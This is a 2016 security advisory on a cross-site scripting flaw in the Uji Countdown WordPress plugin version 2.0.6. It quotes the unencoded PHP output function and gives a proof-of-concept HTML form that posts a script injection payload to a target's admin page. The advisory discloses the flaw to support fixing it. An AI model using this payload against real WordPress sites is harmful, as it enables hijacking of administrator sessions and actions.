Advisory

Yorick Koster, July 2016

Cross-Site Scripting in Uji Countdown WordPress Plugin

Abstract

A Cross-Site Scripting vulnerability was found in the Uji Countdown WordPress Plugin. This issue allows an attacker to perform a wide variety of actions, such as stealing Administrators' session tokens, or performing arbitrary actions on their behalf. In order to exploit this issue, the attacker has to lure/force a logged on WordPress Administrator into opening a malicious website.

OVE ID

OVE-20160724-0029

Tested versions

This issue was successfully tested on Uji Countdown WordPress Plugin version 2.0.6.

Fix

This issue is resolved in Uji Countdown version 2.0.7.

Introduction

The Uji Countdown WordPress Plugin allows users to display a countdown on their post or page. A Cross-Site Scripting vulnerability was found in the Uji Countdown WordPress Plugin. This issue allows an attacker to perform a wide variety of actions, such as stealing Administrators' session tokens, or performing arbitrary actions on their behalf.

Details

The issue exists in the file /classes/class-uji-countdown-admin.php and is caused by the lack of output encoding in the ujic_tabs_values() function.

private function ujic_tabs_values() {
   global $wpdb;
   $ujictab = '';
   $table_name = $wpdb->prefix . "uji_counter";
   $ujic_datas = $wpdb->get_results( "SELECT * FROM $table_name ORDER BY `time` DESC" );
   if ( !empty( $ujic_datas ) ) {
      foreach ( $ujic_datas as $ujic ) {
         $ujic_style = !empty( $ujic->style ) ? $ujic->style : 'classic';
         $ujic_ico = '<span id="ujic-style-' . $ujic_style . '" class="ujic-types">' . $ujic_style . '</span>';
         $ujictab .='<tr>
                     <td>' . $ujic->time . '</td>
                     <td>' . $ujic->title . '</td>
                     <td>' . $ujic_ico . '</td>
                     <td>
                  <a href="?page=uji-countdown&tab=tab_ujic_new&edit=' . $ujic->id . '"><i class="dashicons dashicons-welcome-write-blog"></i>Edit</a> | <a href="options-general.php?page=uji-countdown&del=' . $ujic->id . '"><i class="dashicons dashicons-trash"></i> Delete</a>
               </td>
               </tr>';
      }
   }
   
   return $ujictab;
}

In order to exploit this issue, the attacker has to lure/force a logged on WordPress Administrator into opening a malicious website.

Proof of concept

<html>
   <body>
      <form action="http://<target>/wp-admin/options-general.php?page=uji-countdown&tab=tab_ujic_new&style=classic&save=true" method="POST">
         <input type="hidden" name="ujic&#95;style" value="classic" />
         <input type="hidden" name="ujic&#95;name" value="&quot;><script>alert(1);</script>" />
         <input type="hidden" name="ujic&#95;goof" value="ABeeZee" />
         <input type="hidden" name="ujic&#95;pos" value="center" />
         <input type="hidden" name="ujic&#95;d" value="true" />
         <input type="hidden" name="ujic&#95;h" value="true" />
         <input type="hidden" name="ujic&#95;m" value="true" />
         <input type="hidden" name="ujic&#95;s" value="true" />
         <input type="hidden" name="ujic&#95;txt" value="true" />
         <input type="hidden" name="ujic&#95;size" value="32" />
         <input type="hidden" name="ujic&#95;col&#95;dw" value="&#35;a61ba6" />
         <input type="hidden" name="ujic&#95;col&#95;up" value="&#35;c368c3" />
         <input type="hidden" name="ujic&#95;col&#95;txt" value="&#35;ffffff" />
         <input type="hidden" name="ujic&#95;col&#95;sw" value="&#35;000000" />
         <input type="hidden" name="ujic&#95;col&#95;lab" value="&#35;000000" />
         <input type="hidden" name="ujic&#95;lab&#95;sz" value="13" />
         <input type="hidden" name="ujic&#95;subscrFrmWidth" value="100" />
         <input type="hidden" name="ujic&#95;subscrFrmAboveText" value="Join&#32;Our&#32;Newsletter" />
         <input type="hidden" name="ujic&#95;subscrFrmInputText" value="Enter&#32;your&#32;email&#32;here" />
         <input type="hidden" name="ujic&#95;subscrFrmSubmitText" value="Subscribe" />
         <input type="hidden" name="ujic&#95;subscrFrmSubmitColor" value="&#35;ab02b2" />
         <input type="hidden" name="ujic&#95;subscrFrmThanksMessage" value="Thanks&#32;for&#32;subscribing" />
         <input type="hidden" name="ujic&#95;subscrFrmErrorMessage" value="Invalid&#32;email&#32;address" />
         <input type="hidden" name="submit&#95;ujic" value="Save&#32;Style" />
         <input type="submit" value="Submit request" />
      </form>
   </body>
</html>

Work with us →